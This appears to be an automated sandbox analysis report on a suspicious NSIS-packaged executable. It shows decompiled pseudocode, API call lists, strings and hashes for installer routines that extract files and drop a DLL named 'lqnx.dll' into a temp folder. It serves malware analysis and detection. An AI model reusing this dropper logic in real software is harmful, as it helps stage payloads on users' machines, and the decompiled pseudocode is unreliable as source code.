                                                                                            0x00000000
                                                                                            0x00402e2d
                                                                                            0x00402d12
                                                                                            0x00402d19
                                                                                            0x00402d95
                                                                                            0x00402d99
                                                                                            0x00402d9d
                                                                                            0x00402da2
                                                                                            0x00000000
                                                                                            0x00402d99
                                                                                            0x00402d22
                                                                                            0x00402d27
                                                                                            0x00402d2a
                                                                                            0x00402d2f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d31
                                                                                            0x00402d38
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d3a
                                                                                            0x00402d41
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d43
                                                                                            0x00402d4a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d4c
                                                                                            0x00402d53
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d55
                                                                                            0x00402d5b
                                                                                            0x00402d64
                                                                                            0x00402d6a
                                                                                            0x00402d6d
                                                                                            0x00402d6f
                                                                                            0x00402d75
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d7b
                                                                                            0x00402d7f
                                                                                            0x00402d87
                                                                                            0x00402d87
                                                                                            0x00402d8a
                                                                                            0x00402d8d
                                                                                            0x00402d8f
                                                                                            0x00402d91
                                                                                            0x00402d91
                                                                                            0x00000000
                                                                                            0x00402d8f
                                                                                            0x00402d81
                                                                                            0x00402d85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402da3
                                                                                            0x00402da3
                                                                                            0x00402da9
                                                                                            0x00402db5
                                                                                            0x00402db5
                                                                                            0x00402db8
                                                                                            0x00402dbe
                                                                                            0x00402dc0
                                                                                            0x00402dc0
                                                                                            0x00402dc8
                                                                                            0x00402dc8
                                                                                            0x00000000
                                                                                            0x00402dc8

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00402C66
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe,00000400), ref: 00402C82
                                                                                              • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe,80000000,00000003), ref: 004058A2
                                                                                              • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Program Files (x86)\Gw4n,C:\Program Files (x86)\Gw4n,C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe,C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe,80000000,00000003), ref: 00402CCE
                                                                                            Strings
                                                                                            • "C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" , xrefs: 00402C55
                                                                                            • C:\Program Files (x86)\Gw4n, xrefs: 00402CB0, 00402CB5, 00402CBB
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
                                                                                            • Error launching installer, xrefs: 00402CA5
                                                                                            • Inst, xrefs: 00402D3A
                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                                                                                            • soft, xrefs: 00402D43
                                                                                            • Null, xrefs: 00402D4C
                                                                                            • C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                            • String ID: "C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" $C:\Program Files (x86)\Gw4n$C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                            • API String ID: 4283519449-2029473544
                                                                                            • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                            • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                                                                            • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                            • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402E8E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 174fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 95%
                                                                                            			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418c48;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ec78; // 0x9b57
					E004030E2(_t95 + _t65);
				}
				_t67 = E004030B0( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E004030B0(0x414c48, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E004030B0(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b5ac =  *0x40b5ac & 0x00000000;
					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b090 = 8;
					 *0x414c38 = 0x40cc30;
					 *0x414c34 = 0x40cc30;
					 *0x414c30 = 0x414c30;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030B0(0x414c48, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b080 = 0x414c48;
						 *0x40b084 = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b088 = _t100;
							 *0x40b08c = _v12;
							_t79 = E00406034(0x40b080);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b088; // 0x41cc48
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EB3(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40b088; // 0x41cc48
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                                                                            0x00402e96
                                                                                            0x00402e9a
                                                                                            0x00402e9d
                                                                                            0x00402ea2
                                                                                            0x00402ea4
                                                                                            0x00402ea4
                                                                                            0x00402eab
                                                                                            0x00402eaf
                                                                                            0x00402eb4
                                                                                            0x00402eb6
                                                                                            0x00402eb6
                                                                                            0x00402ebd
                                                                                            0x00402ec2
                                                                                            0x00402ec4
                                                                                            0x00402ecd
                                                                                            0x00402ecd
                                                                                            0x00402ed8
                                                                                            0x00402edf
                                                                                            0x0040305b
                                                                                            0x0040305b
                                                                                            0x00000000
                                                                                            0x00402ee5
                                                                                            0x00402ee9
                                                                                            0x00403046
                                                                                            0x0040309b
                                                                                            0x00403060
                                                                                            0x00403066
                                                                                            0x00403068
                                                                                            0x00403068
                                                                                            0x00403079
                                                                                            0x00000000
                                                                                            0x0040307b
                                                                                            0x0040308e
                                                                                            0x00403040
                                                                                            0x00403040
                                                                                            0x0040305d
                                                                                            0x0040305d
                                                                                            0x00000000
                                                                                            0x00403095
                                                                                            0x00403095
                                                                                            0x00403098
                                                                                            0x00000000
                                                                                            0x00403098
                                                                                            0x0040308e
                                                                                            0x00403079
                                                                                            0x004030a6
                                                                                            0x00000000
                                                                                            0x004030a6
                                                                                            0x0040304b
                                                                                            0x0040304d
                                                                                            0x0040304d
                                                                                            0x00403059
                                                                                            0x004030a3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403059
                                                                                            0x00402ef5
                                                                                            0x00402ef7
                                                                                            0x00402efe
                                                                                            0x00402f05
                                                                                            0x00402f05
                                                                                            0x00402f0c
                                                                                            0x00402f14
                                                                                            0x00402f1e
                                                                                            0x00402f23
                                                                                            0x00402f2b
                                                                                            0x00402f35
                                                                                            0x00402f38
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402f3e
                                                                                            0x00402f3e
                                                                                            0x00402f3e
                                                                                            0x00402f46
                                                                                            0x00402f48
                                                                                            0x00402f48
                                                                                            0x00402f59
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402f5f
                                                                                            0x00402f62
                                                                                            0x00402f68
                                                                                            0x00402f6e
                                                                                            0x00402f6e
                                                                                            0x00402f79
                                                                                            0x00402f7f
                                                                                            0x00402f84
                                                                                            0x00402f8b
                                                                                            0x00402f8e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402f94
                                                                                            0x00402f9a
                                                                                            0x00402f9c
                                                                                            0x00402fa5
                                                                                            0x00402fa7
                                                                                            0x00402fd5
                                                                                            0x00402fdb
                                                                                            0x00402fe4
                                                                                            0x00402fe9
                                                                                            0x00402fe9
                                                                                            0x00402ff0
                                                                                            0x00403034
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402ff2
                                                                                            0x00402ff5
                                                                                            0x00403017
                                                                                            0x0040301c
                                                                                            0x0040301f
                                                                                            0x00403022
                                                                                            0x00403025
                                                                                            0x00403029
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040302f
                                                                                            0x00403003
                                                                                            0x0040300b
                                                                                            0x00000000
                                                                                            0x00403012
                                                                                            0x00403012
                                                                                            0x00000000
                                                                                            0x00403012
                                                                                            0x0040300b
                                                                                            0x00402ff0
                                                                                            0x0040303c
                                                                                            0x00000000
                                                                                            0x0040303c
                                                                                            0x00000000
                                                                                            0x00402f3e

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00402EF5
                                                                                            • GetTickCount.KERNEL32 ref: 00402F9C
                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                                                                            • wsprintfA.USER32 ref: 00402FD5
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,0041CC48,7FFFFFFF,00000000), ref: 00403003
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CountTick$FileWritewsprintf
                                                                                            • String ID: ... %d%%$HLA$HLA
                                                                                            • API String ID: 4209647438-295942573
                                                                                            • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                            • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                                                                                            • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                            • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 73%
                                                                                            			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405727(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E00405BC7();
				}
				E00405E29(0x409c40);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405EC2(0x409c40);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040587F(0x409c40);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42eca8;
						goto L32;
					} else {
						E00405BC7(0x40a440, 0x42f000);
						E00405BC7(0x42f000, 0x409c40);
						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\hardz\AppData\Local\Temp\nsv161C.tmp\lqnx.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405BC7(0x42f000, 0x40a440);
						_t62 = E00405488("C:\Users\hardz\AppData\Local\Temp\nsv161C.tmp\lqnx.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404EB3();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EB3(0xffffffea,  *(_t85 - 0xc));
				 *0x42ecd4 =  *0x42ecd4 + 1;
				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x42ecd4 =  *0x42ecd4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c40);
					E00405488();
					goto L29;
				}
				goto L33;
			}
















                                                                                            0x00401751
                                                                                            0x00401758
                                                                                            0x00401761
                                                                                            0x00401764
                                                                                            0x00401767
                                                                                            0x0040176c
                                                                                            0x00401774
                                                                                            0x00401790
                                                                                            0x00401776
                                                                                            0x00401776
                                                                                            0x00401777
                                                                                            0x00401777
                                                                                            0x00401796
                                                                                            0x004017a0
                                                                                            0x004017a0
                                                                                            0x004017a4
                                                                                            0x004017a7
                                                                                            0x004017ac
                                                                                            0x004017ae
                                                                                            0x004017b0
                                                                                            0x004017b5
                                                                                            0x004017b5
                                                                                            0x004017c0
                                                                                            0x004017c0
                                                                                            0x004017d1
                                                                                            0x004017d3
                                                                                            0x004017d3
                                                                                            0x004017d4
                                                                                            0x004017d4
                                                                                            0x004017d7
                                                                                            0x004017da
                                                                                            0x004017dd
                                                                                            0x004017dd
                                                                                            0x004017e4
                                                                                            0x004017f3
                                                                                            0x004017f8
                                                                                            0x004017fb
                                                                                            0x004017fe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00401800
                                                                                            0x00401803
                                                                                            0x0040185d
                                                                                            0x00401862
                                                                                            0x004015a8
                                                                                            0x0040268f
                                                                                            0x0040268f
                                                                                            0x004028be
                                                                                            0x004028c1
                                                                                            0x004028c1
                                                                                            0x00000000
                                                                                            0x00401805
                                                                                            0x0040180b
                                                                                            0x00401816
                                                                                            0x00401823
                                                                                            0x0040182e
                                                                                            0x00401844
                                                                                            0x00401844
                                                                                            0x00401847
                                                                                            0x00000000
                                                                                            0x0040184d
                                                                                            0x0040184d
                                                                                            0x0040184e
                                                                                            0x0040186b
                                                                                            0x004028c7
                                                                                            0x004028c7
                                                                                            0x004028c7
                                                                                            0x00401850
                                                                                            0x00401850
                                                                                            0x00401851
                                                                                            0x00401492
                                                                                            0x00402241
                                                                                            0x00402241
                                                                                            0x00402241
                                                                                            0x0040184e
                                                                                            0x00401847
                                                                                            0x004028c9
                                                                                            0x004028cd
                                                                                            0x004028cd
                                                                                            0x0040187b
                                                                                            0x00401880
                                                                                            0x0040188e
                                                                                            0x00401893
                                                                                            0x00401899
                                                                                            0x0040189d
                                                                                            0x0040189f
                                                                                            0x004018a7
                                                                                            0x004018b3
                                                                                            0x004018a1
                                                                                            0x004018a1
                                                                                            0x004018a5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004018a5
                                                                                            0x004018bc
                                                                                            0x004018c2
                                                                                            0x004018c4
                                                                                            0x00000000
                                                                                            0x004018ca
                                                                                            0x004018ca
                                                                                            0x004018cd
                                                                                            0x004018e5
                                                                                            0x004018cf
                                                                                            0x004018d2
                                                                                            0x004018db
                                                                                            0x004018db
                                                                                            0x004018ea
                                                                                            0x004018ef
                                                                                            0x0040223c
                                                                                            0x00000000
                                                                                            0x0040223c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • lstrcatA.KERNEL32(00000000,00000000,gqeqcda,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,gqeqcda,gqeqcda,00000000,00000000,gqeqcda,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                                                              • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,gqjlpjiaybpobgywdcz Setup,NSIS Error), ref: 00405BD4
                                                                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                              • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041CC48,74E5EA30), ref: 00404F0F
                                                                                              • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsv161C.tmp$C:\Users\user\AppData\Local\Temp\nsv161C.tmp\lqnx.dll$gqeqcda
                                                                                            • API String ID: 1941528284-2043369155
                                                                                            • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                            • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                                                                            • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                            • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405EE9(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                            0x00405f00
                                                                                            0x00405f09
                                                                                            0x00405f0b
                                                                                            0x00405f0b
                                                                                            0x00405f0f
                                                                                            0x00405f21
                                                                                            0x00405f1b
                                                                                            0x00405f1b
                                                                                            0x00405f1b
                                                                                            0x00405f25
                                                                                            0x00405f39
                                                                                            0x00405f4d
                                                                                            0x00405f54

                                                                                            APIs
                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                                                            • wsprintfA.USER32 ref: 00405F39
                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                                            • API String ID: 2200240437-4240819195
                                                                                            • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                            • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                                                                            • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                            • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004058CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                            0x004058d1
                                                                                            0x004058d7
                                                                                            0x004058d8
                                                                                            0x004058d8
                                                                                            0x004058d9
                                                                                            0x004058e0
                                                                                            0x004058ea
                                                                                            0x004058f7
                                                                                            0x004058fa
                                                                                            0x00405902
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405906
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405908
                                                                                            0x00000000
                                                                                            0x00405908
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 004058E0
                                                                                            • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
